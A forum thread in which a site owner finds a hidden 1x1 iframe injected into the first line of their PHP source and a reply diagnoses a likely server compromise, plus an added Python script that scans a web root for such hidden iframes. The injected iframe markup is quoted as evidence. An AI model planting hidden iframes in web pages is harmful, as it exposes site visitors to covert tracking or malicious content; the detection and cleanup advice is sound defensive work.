This morning I noticed a horde of PHP warnings at the top of my page; something was sending output before it was supposed to. Inspecting the source, I found some code embedded in the first line of my source, an iframe.
<iframe src= http://removed URL?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
OK, so how does this get into my source? The passwords were changed within the last two months, and I guard that pwd pretty closely.
Could it have been intercepted en-route and modified, then replaced while I had an open FTP session?
Could it be a security lapse or failure with my host?
I guess it could be anything as long as we're guessing, so what's the most likely scenario?
Thanks
It is unlikely to be due to the FTP transfer being intercepted - more likely is that the server has been compromised. If it is a shared server, pack up, change the DNS and restore your site at a new host (or at least on a new server). As you don't know what has been altered, you should use a known good backup. If it is a dedicated server, it needs taking offline and probably reinstalling from scratch. It goes without saying that you need to change every single password and login: you have to assume that if the server has been compromised that the attacker has access to absolutely everything. Do you store credit card numbers and the like?
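Added example, not part of either post: one way to check every file under a web root (or a backup you intend to restore) for the kind of injection quoted in the question, a borderless 1x1 iframe. The sample URL is a constructed placeholder, and the extension list and the function names are assumptions of this sketch.

```python
import os
from html.parser import HTMLParser

# Extensions assumed worth scanning on a PHP site (an assumption; adjust as needed).
SCAN_EXT = (".php", ".html", ".htm", ".inc", ".tpl")
# Constructed sample: an injected 1x1 iframe on line 1, then a legitimate embed.
SAMPLE = (
    '<iframe src=http://example.invalid/?id=index12 frameborder="0" width="1" '
    'height="1" scrolling="no" name=counter></iframe>\n'
    '<?php echo "hello"; ?>\n'
    '<iframe src="https://video.example.invalid/e" width="560" height="315"></iframe>\n'
)

def tiny(value):
    """True for a width/height of 0 or 1, with or without a 'px' suffix."""
    return (value or "").strip().lower().removesuffix("px") in ("0", "1")

class HiddenIframeFinder(HTMLParser):
    """Collects (line, src) for iframes sized 0-1 px or hidden via inline CSS."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)  # the parser also accepts unquoted values such as src=http://...
        style = (a.get("style") or "").replace(" ", "").lower()
        css_hidden = "display:none" in style or "visibility:hidden" in style
        if css_hidden or (tiny(a.get("width")) and tiny(a.get("height"))):
            self.hits.append((self.getpos()[0], a.get("src")))

def scan_text(text):
    finder = HiddenIframeFinder()
    finder.feed(text)
    return finder.hits

def scan_tree(root):
    """Return {relative_path: [(line, src), ...]} for files containing hidden iframes."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(SCAN_EXT):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report
```

Iframes written out by JavaScript inside a `<script>` block are not parsed as tags here, so a clean result from this scan does not show that a file is unmodified.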
It's taking a lot of restraint to keep from expressing my frustration, so I'll just say 'one more thing to take care of'.